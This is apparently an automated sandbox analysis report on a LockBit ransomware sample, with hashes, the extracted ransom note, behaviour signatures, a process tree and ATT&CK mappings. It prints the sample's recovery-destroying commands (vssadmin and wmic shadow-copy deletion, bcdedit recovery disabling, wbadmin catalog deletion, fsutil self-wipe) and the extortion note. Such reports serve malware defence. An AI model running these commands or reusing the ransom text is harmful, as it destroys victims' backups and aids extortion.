Analysis

  • max time kernel
    722s
  • max time network
    728s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 05:46

General

  • Target

    ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe

  • Size

    191KB

  • MD5

    0859a78bb06a77e7c6758276eafbefd9

  • SHA1

    a72e18efa33f1e3438dbb4451c335d487cbd4082

  • SHA256

    ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d

  • SHA512

    49ca427843dd5c5cefef3d50206b0cf772152f78f82bf42a927aa0d70ceed1c1e828cb20f7f2e8dce58bf2c33e14ff75ec74319d15671b9268e0c18457722c5d

Malware Config

Extracted

Path

C:\odt\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?F51E3D94FA5D7445A35EEF5AE7AF2EA0 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR.
URLs

http://lockbitks2tvnmwk.onion/?F51E3D94FA5D7445A35EEF5AE7AF2EA0

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
    "C:\Users\Admin\AppData\Local\Temp\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe"
    1⤵
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Program Files directory
      • Modifies Control Panel
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:988
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1260
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1504
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2104
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\System32\cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe & Del /f /q C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3064
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.7 -n 3
            5⤵
            • Runs ping.exe
            PID:248
          • C:\Windows\SysWOW64\fsutil.exe
            fsutil file setZeroData offset=0 length=524288 C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
            5⤵
              PID:632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3340
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
        PID:1020
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:4092
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
          • Checks SCSI registry key(s)
          PID:2816

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Command-Line Interface

        1
        T1059

        Persistence

        Change Default File Association

        1
        T1042

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        3
        T1112

        File Deletion

        3
        T1107

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Query Registry

        2
        T1012

        Peripheral Device Discovery

        2
        T1120

        System Information Discovery

        3
        T1082

        Remote System Discovery

        1
        T1018

        Collection

        Data from Local System

        1
        T1005

        Impact

        Inhibit System Recovery

        4
        T1490

        Defacement

        1
        T1491

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
          MD5

          1f4f6abfced4c347ba951a04c8d86982

          SHA1

          a4c486b0926f55e99d12f749135612602cc4bf64

          SHA256

          1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18

          SHA512

          ae9d631a193d04194bcb54ccf5573730c04b2d9d732addf04af2100e7d67584a3cfba67cfaa2a9da05099d71c56dd58cfdb9f58d070b72ae58d0add20cf0afd3

        • C:\Users\Admin\AppData\Local\Temp\3582-490\ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d.exe
          MD5

          1f4f6abfced4c347ba951a04c8d86982

          SHA1

          a4c486b0926f55e99d12f749135612602cc4bf64

          SHA256

          1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18

          SHA512

          ae9d631a193d04194bcb54ccf5573730c04b2d9d732addf04af2100e7d67584a3cfba67cfaa2a9da05099d71c56dd58cfdb9f58d070b72ae58d0add20cf0afd3

        • C:\Users\Admin\AppData\Local\Temp\tmp5023.tmp
          MD5

          9fc77a3bd5fbce5bfb131f469142477c

          SHA1

          1390897c78d1ac85e95f96e17b7031a24a45f275

          SHA256

          b499624651b60ccdc19c5c8a3969e34f0caaf786e4189016b2c884c6db97dcc7

          SHA512

          7b738b82c7b77ef248f69faabaa0f4cc58c982d7ac9a6105a852f4cc38a278a4e2b5e2d5e5bcdfb6534054db421325752e310d90fdb559d0648eef4c2a9fbf72

        • C:\Windows\svchost.com
          MD5

          36fd5e09c417c767a952b4609d73a54b

          SHA1

          299399c5a2403080a5bf67fb46faec210025b36d

          SHA256

          980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

          SHA512

          1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

        • C:\Windows\svchost.com
          MD5

          36fd5e09c417c767a952b4609d73a54b

          SHA1

          299399c5a2403080a5bf67fb46faec210025b36d

          SHA256

          980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

          SHA512

          1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

        • memory/248-130-0x0000000000000000-mapping.dmp
        • memory/632-131-0x0000000000000000-mapping.dmp
        • memory/988-120-0x0000000000000000-mapping.dmp
        • memory/1260-122-0x0000000000000000-mapping.dmp
        • memory/1504-123-0x0000000000000000-mapping.dmp
        • memory/2104-124-0x0000000000000000-mapping.dmp
        • memory/2316-125-0x0000000000000000-mapping.dmp
        • memory/2536-116-0x0000000000000000-mapping.dmp
        • memory/3064-128-0x0000000000000000-mapping.dmp
        • memory/3160-119-0x0000000000000000-mapping.dmp
        • memory/3960-121-0x0000000000000000-mapping.dmp